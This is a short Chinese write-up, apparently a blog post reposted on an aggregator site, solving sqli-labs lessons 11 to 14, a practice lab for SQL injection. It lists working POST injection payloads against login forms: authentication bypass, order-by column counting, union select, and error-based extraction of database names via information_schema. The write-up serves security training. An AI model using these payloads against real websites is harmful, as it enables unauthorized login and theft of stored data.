美文网首页
sqli-labs less11-less14

sqli-labs less11-less14

作者: Yix1a | 来源:发表于2019-05-13 16:30 被阅读0次

  • less11

  • POST型与GET型,不大相同。
  • 输入用户名1',得到错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1
  • 猜测语句为
    select username,password from table where username = 'inputname' and password = 'inputpass'
  • 让这个语句为真就会得到结果,怎么为真呢?
  • 构建1' or 1=1 #或-- (有空格)
  • 1' or 1=1 limit 1,1# 会得到第二项结果
  • 测试POST的字段数目
  • 1' or 1=1 order by 3#
  • 联合查询1' or 1=1 union select 1,2 #是没有反应的,要用1' union select 1,2 #,因为联合查询要前面的为false,所以更保险的是1' and 1=2 union select 1,2 #
    分析: union 前面的 where 条件肯定是为假的,因为 and 了一个 1=2,在网上查找资料说的是 id=1 and 1=2 的 结果集 是 0,所以显示 union select 后面的 结果集

  • less12

    • 与less11类似,不过是1‘变成1")

  • less13

  • 输入',",),)),\等测试
  • 报错发现是id=1') or 1=1 #
  • 进行POST报错注入1') and (select 1 from (select count(),concat('::',(select schema_name from information_schema.schemata limit 0,1),'::',floor(rand()2))x from information_schema.tables group by x) a ) #

  • less14

  • 与less11类似就是变成了双引号

相关文章

网友评论

      本文标题:sqli-labs less11-less14

      本文链接:https://www.haomeiwen.com/subject/mxqraqtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|sqli-labs less11-less14|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!